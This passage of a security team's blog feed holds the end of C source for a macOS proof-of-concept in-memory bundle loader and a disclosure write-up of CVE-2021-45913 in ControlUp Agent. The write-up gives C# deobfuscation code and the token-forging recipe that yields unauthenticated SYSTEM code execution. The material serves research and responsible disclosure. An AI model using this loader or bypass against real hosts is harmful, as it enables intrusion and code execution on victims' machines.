    fprintf(stderr, "Could not locate executable with '%s'.\n", pathToBundle);
  } else {
    // Set moduleName for the call to NSLinkModule.

    moduleName = codePath;
    message = "... from NSCreateObjectFileImageFromFile";

    // Create the object file image directly from the file.

    dyldErr = NSCreateObjectFileImageFromFile(codePath, &amp;ofi);

    if (dyldErr != NSObjectFileImageSuccess) {
      fprintf(stderr, "Could not create object file image.\n");
    } else {
      unsigned long options;
      // NSLINKMODULE_OPTION_PRIVATE: Don't publish the bundle's exports to the global namespace
      // NSLINKMODULE_OPTION_RETURN_ON_ERROR: Return, rather than abort(), on error
      // NSLINKMODULE_OPTION_BINDNOW: Link the module now, rather than on demand
      options = NSLINKMODULE_OPTION_PRIVATE | NSLINKMODULE_OPTION_RETURN_ON_ERROR;
      #if !defined(NDEBUG)
      options |= NSLINKMODULE_OPTION_BINDNOW;
      #endif
      m = NSLinkModule(ofi, moduleName, options);

      if (m == NULL) {
        fprintf(stderr, "Could not link module.\n");
      } else {
        s = NSLookupSymbolInModule(m, "_" kBundleEntryPointName);
        if (s == NULL) {
          fprintf(stderr, "Could not lookup symbol.\n");
        } else {
          f = NSAddressOfSymbol(s);
          if (f == NULL) {
            fprintf(stderr, "Could not get address of symbol.\n");
          } else {
            f(message);
          }
        }
      }
    }
  }

  if (m != NULL) {
    ok = NSUnLinkModule(m, NSUNLINKMODULE_OPTION_NONE);
    assert(ok);
  }
  if (ofi != NULL) {
    ok = NSDestroyObjectFileImage(ofi);
    assert(ok);
    codeAddr = NULL;
  }
  if (codeAddr != NULL) {
    junk = (int) vm_deallocate(mach_task_self(), (vm_address_t) codeAddr, codeSize);
    assert(junk == 0);
  }
}

static void PrintUsage(void) {
  fprintf(stderr, "loader ( -cf | -ns ) PathToBundle\n");
}

int main(int argc,
  const char * argv[]) {
  if (argc != 3) {
    PrintUsage();
    exit(EXIT_FAILURE);
  }

  if (strcmp(argv[1], "-cf") == 0) {
    cf_load_bundle(argv[2]);
  } else if (strcmp(argv[1], "-ns") == 0) {
    nsfromfile_load_bundle(argv[2]);
  } else {
    PrintUsage();
    exit(EXIT_FAILURE);
  }

  return EXIT_SUCCESS;
}
</code></pre>

<p>The following screenshot demonstrates this loading behavior in action:</p>

<p><img src="https://rtx.meta.security/assets/images/In_Memory_macOS/hello.png" alt="&quot;Proof of the PoC loader executing&quot;" /></p>]]></content><author><name>Manish Bhatt, Red Team X</name></author><category term="post-exploitation" /><summary type="html"><![CDATA[]]></summary></entry><entry><title type="html">Uncovering Hidden .NET Assemblies</title><link href="https://rtx.meta.security/reversing/2022/09/21/Uncovering_Hidden_NET_Assemblies.html" rel="alternate" type="text/html" title="Uncovering Hidden .NET Assemblies" /><published>2022-09-21T00:00:00+00:00</published><updated>2022-09-21T00:00:00+00:00</updated><id>https://rtx.meta.security/reversing/2022/09/21/Uncovering_Hidden_NET_Assemblies</id><content type="html" xml:base="https://rtx.meta.security/reversing/2022/09/21/Uncovering_Hidden_NET_Assemblies.html"><![CDATA[<p>We recently completed a security review of ControlUp Agent by ControlUp Technologies. The software is responsible for remote management and analytics of agent hosts on which it runs. The software is typically deployed in virtualization infrastructure environments. This writeup details the steps taken to assess the software, bypass obfuscation, and get remote unauthenticated code execution as NT AUTHORITY\SYSTEM on any host running the ControlUp Agent software (&lt; v8.2.5) so long as it’s reachable on the network.</p>

<p>We reported this issue to ControlUp on May 11, 2021. They acknowledged the report the next day, thanked us, and informed us that the usage of static encryption keys had already been proactively fixed as of version 8.2.5. You can read the <a href="https://github.com/fbredteam/external-disclosures/security/advisories/GHSA-vmc4-wm3f-w3fr">original report we sent to ControlUp</a>. CVE-2021-45913 was assigned to track this vulnerability.</p>

<p>The ControlUp Agent (cuAgent) software is written in .NET. This is ideal for reverse engineering – .NET usually decompiles to nearly the same thing that the developer initially wrote. But we noticed something strange with the Smart-X ControlUp binaries. First, relatively few .NET assembly DLLs came along with the product – not strange by itself, though .NET software often ships with many extra DLLs. More telling, Process Explorer showed many loaded assemblies that we weren’t able to find in DotPeek or on disk.</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/cuAgent_properties.png" alt="&quot;Process Explorer showing loaded Assemblies in cuAgent.exe&quot;" /></p>

<p>They also use some sort of obfuscation. Class, method, and variable names look like this:</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/obfuscation.png" alt="&quot;Obfuscated .NET method&quot;" /></p>

<p>Beyond the odd class, method, and variable names, there is a lot of dead code. Note that the case 0: on line 337 will never execute; it looks like obfuscation meant to slow down a reverser. Many “if (false)” statements are also littered throughout the code.</p>

<p>Based on inspecting the running binary, we know that they’re creating WCF named pipes and TCP endpoints. But we couldn’t find any references in the code where this happens.</p>

<p>Reviewing more code, we stumbled across this:</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/chararray.png" alt="&quot;Suspicious charArray&quot;" /></p>

<p>That seemed odd, so I spent a bit of time reversing what was going on. Each character of that charArray gets bitwise inverted, at which point it is far more readable:</p>

<pre><code class="language-.NET">AppLoadTimeTracer.AgentSideCommon, Version=1.0.0.0, Culture=neutral, \
PublicKeyToken=null`pkC3o4ibHqbaW9eT+sfYIA==`SmartX.Common, Version=1.0.0.0, \
Culture=neutral, PublicKeyToken=null`nZLN7WTbcAXIfmox4Owtnw==`...
</code></pre>

<p>After splitting on the backtick delimiter, we are left with a list of AssemblyInfo:base64 pairs. At this point, I exported the code that does the unpacking and copied it to a Visual Studio .NET project where I could rename variables and clean it up by removing those dead conditionals.</p>

<p>Reversing more of the code shows they’re getting the manifest resource stream based on the base64 name and passing it to a new function.</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/des.png" alt="&quot;Reversed code showing DES being used&quot;" /></p>

<p>In this next function, they read and ignore the first 3 bytes of the stream. They read the 4th byte as a flag byte. The decoded bits of the flag are:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0: unknown
1: Encrypted assembly
2: unknown
3: Compressed assembly
4-7: unknown
</code></pre></div></div>

<p>An assembly resource file can be a raw assembly, encrypted, compressed, or encrypted and compressed. If it’s compressed, they simply call DeflateStream on it. If it’s encrypted, they use DESCryptoServiceProvider. But where are the key and IV?</p>

<p>In the encrypted case, the next 8 bytes in the resource stream are the IV and the following 8 bytes are the key:</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/desdecrypt.png" alt="&quot;Reversed code showing DES decryption function and where key + IV are found&quot;" /></p>

<p>So we now have everything we need to retrieve all the assemblies from the executables and write them to files. Once we write them to a file, we can load them in DotPeek and keep working:</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/dotpeek.png" alt="&quot;DotPeek showing decrypted assemblies&quot;" /></p>

<p>In the end, we were able to recover 156 additional assemblies across 3 obfuscated service binaries. We ended up finding the named pipe and TCP WCF handlers, as well.</p>

<p>Once we recovered the inner assemblies, we found some other oddities. They store some encrypted RSA private keys in the ControlUp Monitor’s obfuscated resource files. One of the keys is used in the authentication between the ControlUp Monitor and the ControlUp Agent. Getting this encrypted RSA key was actually the reason to start digging so deeply into the second-level .NET Assembly packing. The RSA private key is encrypted, but it uses the same hard-coded 3DES key used in many ControlUp methods. The 3DES key doesn’t provide strong confidentiality since it’s easily found in all of the executable’s resources.</p>

<p>This RSA private key is used to decrypt the session key/IV returned from the PrepareConnection call. The session key/IV is used to 3DES encrypt the UserTokens that are then decrypted on the server. This is the root of the authentication bypass - if an unauthenticated user knows this 3DES key/IV, they can encrypt a UserTokens value of valid@junk;$SID (where “junk” is ignored, “valid” is what they use to determine if the connection is valid, and $SID is the SID of an account in the Administrators group). That’s it! No password, no Kerberos ticket – nothing else is required.</p>

<p>The end result is unauthenticated remote code execution as <code class="language-plaintext highlighter-rouge">NT AUTHORITY\SYSTEM</code>. This affects all users of the ControlUp Agent software with version &lt; 8.2.5.</p>

<p>Running the PoC shows that we can connect to a socket, send it some packets, and get it to execute code for us as <code class="language-plaintext highlighter-rouge">NT AUTHORITY\SYSTEM</code>:</p>

<p><img src="https://rtx.meta.security/assets/images/NET_Assemblies/poc.png" alt="&quot;PoC works, showing execution as SYSTEM&quot;" /></p>

<p>More detail, including the PoC, can be found in <a href="https://github.com/metaredteam/external-disclosures/security/advisories/GHSA-vmc4-wm3f-w3fr">our advisory</a>. The code that I used to do the de-obfuscation is included here:</p>

<pre><code class="language-.NET">using System;
using System.IO;
using System.IO.Compression;
using System.Reflection;
using System.Security.Cryptography;

namespace StringArrayReverser
{
    class Program
    {

        static string[] DecodeString(char[] input)
        {
            for (int index = 0; index &lt; input.Length; ++index)
                input[index] = (char)~(ushort)input[index];
            string[] strArray = new string(input).Split('`');
            return strArray;
        }

        static void FalconReverser()
        {
            char[] charArray = "ﾾﾏﾏﾳﾐﾞﾛﾫﾖﾒﾚﾫﾍ&lt;SNIP&gt;ﾼﾑﾖￆﾞﾝￔﾶﾵￔﾈￂￂ".ToCharArray();
            var strArray = DecodeString(charArray);

            UnpackAssemblies("AppLoadTimeTracer.exe", strArray);
        }

        static byte[] DESDecrypt(Stream InStream)
        {
            MemoryStream memoryStream = new MemoryStream();
            Stream stream = InStream;

            // Skip the first 3 bytes, then read the 4th as the (inverted) flag byte
            for (int index = 1; index &lt; 4; ++index)
            {
                InStream.ReadByte();
            }
            ushort Flags = (ushort)~InStream.ReadByte();

            // Encrypted
            if (((int)Flags &amp; 2) != 0)
            {
                DESCryptoServiceProvider cryptoServiceProvider = new DESCryptoServiceProvider();
                byte[] DESIV = new byte[8];
                InStream.Read(DESIV, 0, 8);
                cryptoServiceProvider.IV = DESIV;
                byte[] DESKey = new byte[8];
                InStream.Read(DESKey, 0, 8);

                cryptoServiceProvider.Key = DESKey;

                memoryStream.Position = 0L;
                ICryptoTransform decryptor = cryptoServiceProvider.CreateDecryptor();
                int inputBlockSize = decryptor.InputBlockSize;
                int outputBlockSize = decryptor.OutputBlockSize;
                byte[] numArray1 = new byte[decryptor.OutputBlockSize];
                byte[] numArray2 = new byte[decryptor.InputBlockSize];
                int position;
                for (position = (int)InStream.Position; (long)(position + inputBlockSize) &lt; InStream.Length; position += inputBlockSize)
                {
                    InStream.Read(numArray2, 0, inputBlockSize);
                    int count = decryptor.TransformBlock(numArray2, 0, inputBlockSize, numArray1, 0);
                    memoryStream.Write(numArray1, 0, count);
                }

                InStream.Read(numArray2, 0, (int)(InStream.Length - (long)position));
                byte[] buffer3 = decryptor.TransformFinalBlock(numArray2, 0, (int)(InStream.Length - (long)position));
                memoryStream.Write(buffer3, 0, buffer3.Length);
                stream = (Stream)memoryStream;
                stream.Position = 0L;
            }
            if (((int)Flags &amp; 8) != 0)
            {
                var tmpStream = new MemoryStream();
                DeflateStream deflateStream = new DeflateStream(stream, CompressionMode.Decompress);
                deflateStream.CopyTo(tmpStream);

                memoryStream = tmpStream;
            }

            // No flag bits set (raw byte 0xFF): plain, unprocessed assembly
            if (Flags == 0xff00)
            {
                memoryStream.SetLength(0);
                stream.CopyTo(memoryStream);
            }

            return memoryStream.ToArray();
        }

        static void UnpackAssemblies(string parent, string[] strArray)
        {
            int i;

            Assembly ass = Assembly.LoadFrom(parent);

            Console.WriteLine("Loaded {0}", ass.FullName);
            var dirname = "output\\" + parent + "\\";
            Directory.CreateDirectory("output");
            Directory.CreateDirectory(dirname);
            for (i = 0; i &lt; strArray.Length; i += 2)
            {
                var info = strArray[i];
                var b64 = strArray[i + 1];

                var name = info.Split(',')[0];

                Console.WriteLine("{0} {1} {2}", name, b64, info);
                var mrs = ass.GetManifestResourceStream(b64);
                var decryptedBytes = DESDecrypt(mrs);
                if (b64.EndsWith("#"))
                {
                    File.WriteAllBytes(dirname + "\\" + name + ".pdb", decryptedBytes);
                }
                else
                {
                    File.WriteAllBytes(dirname + "\\" + name + ".dll", decryptedBytes);
                }
            }
        }

        static void cuAgentReverser()
        {
            /* Note: This needs to be fixed to include the array from the binary. */
            char[] charArray = "ﾬﾒﾞﾍﾋﾧ\x&lt;SNIP&gt;\xFFC9ﾪﾚﾛﾮￂￂ".ToCharArray();
            var strArray = DecodeString(charArray);

            UnpackAssemblies("cuAgent.exe", strArray);

        }

        static void ConsoleReverser()
        {
            char[] charArray = "ﾾﾜﾋﾖﾐﾑﾺﾉ&lt;SNIP&gt;ﾏﾮￊￌﾙﾘￂￂ".ToCharArray();
            var strArray = DecodeString(charArray);

            UnpackAssemblies("ControlUpConsole.exe", strArray);
        }

        static void Main(string[] args)
        {

            FalconReverser();

            cuAgentReverser();

            ConsoleReverser();
        }
    }
}
</code></pre>]]></content><author><name>Michael Henry, Red Team X</name></author><category term="reversing" /><summary type="html"><![CDATA[]]></summary></entry></feed>